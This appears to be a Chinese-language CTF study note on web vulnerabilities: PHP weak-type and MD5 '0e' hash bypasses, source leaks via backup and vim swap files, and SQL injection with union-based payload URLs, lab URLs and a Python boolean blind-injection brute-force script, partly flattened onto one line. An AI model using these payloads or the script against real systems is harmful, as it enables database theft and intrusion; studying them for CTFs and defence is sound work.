这里写目录标题
- 1.使用hackbar
- 2.php漏洞基本分析 弱类型语言
- 2.2 php漏洞找到隐藏的源代码之 index.php~
- 2.3 php漏洞找到隐藏的源代码之 vim的临时文件 /.index.php.swp
- 3.php漏洞基本分析 数组
- 3.php漏洞基本分析 extract
- 4.php漏洞基本分析 strpos eregi函数漏洞
- 4.php漏洞基本分析 eregi函数漏洞
- 5.SQL注入漏洞分析
- 5.1 整数型 联合注入
- 5.1.1 判断注入点
- 5.1.2 判断列数
- 5.1.3 查询库名
- 5.1.4 查询表名
- 5.1.4 查询数据库列名
- 5.1.4 查询结果
- 5.1 字符型 联合注入
- 5.3 布尔盲注
- 盲注常用函数
- 编写布尔盲注脚本
- 6 SQL注入实操
- 7 PHP反序列化漏洞分析与实操讲解
- 8 文件上传漏洞
1.使用hackbar
通过hackbar在浏览器发送请求包就能得到请求内容。
2.php漏洞基本分析 弱类型语言
如果字符串跟数字匹配会自动转换成数字。
案例
2.2 php漏洞找到隐藏的源代码之 index.php~
index.php是一个用PHP语言开发的网站的首页,index是普遍意义上的“首页”,也就是你输入一个域名后会打开一个页面,基本上就是index.xxxx(基本上首页都不会把index.xxxx显示在url里,但也不绝对) 使用index.php~下载到源代码
下载到源文件后发现代码需要输入两个相同的md5进行判断才给通过。所以这道题可以用0e开头的md5进行绕过。
处理hash字符串时,PHP会将每一个以 0E开头的哈希值解释为0,那么只要传入的不同字符串经过哈希以后是以 0E开头的,那么PHP会认为它们相同
下面是一些哈希后0E开头的字符
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
240610708
0e462097431906509019562988736854
314282422
0e990995504821699494520356953734
571579406
0e972379832854295224118025748221
903251147
0e174510503823932942361353209384
1110242161
0e435874558488625891324861198103
1320830526
0e912095958985483346995414060832
1586264293
0e622743671155995737639662718498
2302756269
0e250566888497473798724426794462
2427435592
0e067696952328669732475498472343
2653531602
0e877487522341544758028810610885
3293867441
0e471001201303602543921144570260
3295421201
0e703870333002232681239618856220
3465814713
0e258631645650999664521705537122
3524854780
0e507419062489887827087815735195
3908336290
0e807624498959190415881248245271
4011627063
0e485805687034439905938362701775
4775635065
0e998212089946640967599450361168
4790555361
0e643442214660994430134492464512
5432453531
0e512318699085881630861890526097
5579679820
0e877622011730221803461740184915
5585393579
0e664357355382305805992765337023
6376552501
0e165886706997482187870215578015
7124129977
0e500007361044747804682122060876
7197546197
0e915188576072469101457315675502
7656486157
0e451569119711843337267091732412
QLTHNDT
0e405967825401955372549139051580
QNKCDZO
0e830400451993494058024219903391
EEIZDOI
0e782601363539291779881938479162
TUFEPMC
0e839407194569345277863905212547
UTIPEZQ
0e382098788231234954670291303879
UYXFLOI
0e552539585246568817348686838809
IHKFRNS
0e256160682445802696926137988570
PJNPDWY
0e291529052894702774557631701704
ABJIHVY
0e755264355178451322893275696586
DQWRASX
0e742373665639232907775599582643
DYAXWCA
0e424759758842488633464374063001
GEGHBXL
0e248776895502908863709684713578
GGHMVOE
0e362766013028313274586933780773
GZECLQZ
0e537612333747236407713628225676
NWWKITQ
0e763082070976038347657360817689
NOOPCJF
0e818888003657176127862245791911
MAUXXQC
0e478478466848439040434801845361
MMHUWUV
0e701732711630150438129209816536
2.3 php漏洞找到隐藏的源代码之 vim的临时文件 /.index.php.swp
用户在使用vim编辑,意外退出时,会在当前目录生成备份文件
以 index.php 为例 第一次产生的缓存文件名为 .index.php.swp
第二次意外退出后,文件名为.index.php.swo
第三次产生的缓存文件则为 .index.php.swn
注意:index前有 " . "
3.php漏洞基本分析 数组
题目要求输入的v3必须跟flag的一致才能给你返回。
php的某些函数是不能输入数组的,如果强行输入数组会返回一个null,而在php中对null中取非他就是True.
只要看到一个只能接收字符串的输入,就往里面灌入一个其他类型的函数,可能会有意想不到的结果。
这道题也是一样只要注入一个不同的数组就能得到结果。
/?v1[]=1&v2[]=2&v3[]=3 直接灌入数组
3.php漏洞基本分析 extract
extract 把数组转换成变量名和变量值的生命。
该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。
这道题可以通过强行传入数组或者传入空值来解决。
/extract.php/?aurora&flage 直接不写内容就是空
4.php漏洞基本分析 strpos eregi函数漏洞
案例
这道题可以用数组绕过。
4.php漏洞基本分析 eregi函数漏洞
eregi函数在进行匹配的时候,如果碰到%00会意味着字符串的结束,因此我们只需要传入%001234,他截取到%00后匹配的时候就会变成111,111在1114中,成功绕过
案例 https://blog.csdn.net/m0_52432374/article/details/113647955?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-113647955-blog-124258277.235^v43^control&spm=1001.2101.3001.4242.1&utm_relevant_index=3
5.SQL注入漏洞分析
只要通过让他的语句结果为真就可以进行注入,找到注入点让他的结果不一样
5.1 整数型 联合注入
5.1.1 判断注入点
条件1 回显结果到网页
案例页面 输入的结果可以显示到网页中。
他的注入点就在输入的地方。在原来数据查询的基础上增加一个条件,同时要求他这个条件成立。
/1.php?id=2 and 1=0 通过在注入点后面增加sql语句就可以发现原始的sql有没有拼接我们新加进去的语句。如果加进去了就证明注入点可用。
5.1.2 判断列数
通过拼接order by来猜测数据有多少列,因为超过后会直接报错。
?id=2 order by 4
5.1.3 查询库名
通过拼接 union 来查询数据库名
/1.php?id=0 union select 1,2,database()
5.1.4 查询表名
通过之前查询出来的数据库,查询这个库里面的全部表
/1.php?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where%20table_schema= ‘ctf’
5.1.4 查询数据库列名
/1.php?id=0 UNION SELECT 1,2,group_concat(COLUMN_NAME) FROM information_schema.columns WHERE table_name = ‘answer’
5.1.4 查询结果
/1.php?id=0 UNION select 1,2,flag from answer
5.1 字符型 联合注入
把内容加成了字符型,如果使用之前的1=1的方式会被带成一个整体带入请求里面也就是字符串。
解决方案
跟之前的方式一样,不过要添加一个闭合引号以及注释引号
步骤还是跟之前的一样就是添加了几个引号
5.3 布尔盲注
没有结果的回显。
解决办法
案例
通过sql语句的返回真假 去猜测这个数据库的长度。
盲注常用函数
通过这些语句猜测数据库里面的库和表名,暴力破解的方式进行猜测。
编写布尔盲注脚本
使用盲注脚本进行暴力破解
# 导入requests发送请求,导入re正则表达式对响应包进行筛选
import re
import requests# 首先测试一下是否能够正常访问到测试地址
url = "http://test.com"
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
# DBname = ''
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ''(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
response = requests.get(url_template,headers = headers)
print(response)def GetDBName():# 获取数据库的长度print("----------测试数据库长度--------------")url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"for i in range(1, 99):current_url = url_template.format(i)response = requests.get(current_url, headers=headers)if re.search(r'You are in',response.text):len = iprint("数据库长度为:", i)break# 测试数据库名称print("----------测试数据库名--------------")DBname = ''url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"for i in range(1, len+1):for j in range(33, 127):# 拼接构造需要的测试的URL地址,通过format函数批量构造current_url1 = url_template1.format(i, j)
# print(current_url1)# 发送请求response1 = requests.get(current_url1, headers=headers)# 判断是否成功if re.search(r'You are in', response1.text):DBname += chr(j)print("数据库名为:", DBname)breakif __name__ == '__main__':GetDBName()
6 SQL注入实操
找到列数后查询库名。
/?r=content&cid=0%27%20union%20select%201,2,3,4,5,6,7,8,9,10,database(),12,13%23
在查询他的表名
http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0' union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13 from information_schema.tables where table_schema='cuni'%23
列名查询数
http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,group_concat(COLUMN_NAME),12,13%20FROM%20information_schema.columns%20WHERE%20table_name%20=%20%27adword%27%23union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13%20from%20information_schema.tables%20where%20table_schema=%27cuni%27%23
查询数据库内容
http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0' UNION select 1,2,3,4,5,6,7,8,9,10,date,12,13 from content %23
7 PHP反序列化漏洞分析与实操讲解
序列号只能序列化属性,不序列化方法
样例
魔术方法介绍:https://blog.csdn.net/weixin_45954730/article/details/131861020
8 文件上传漏洞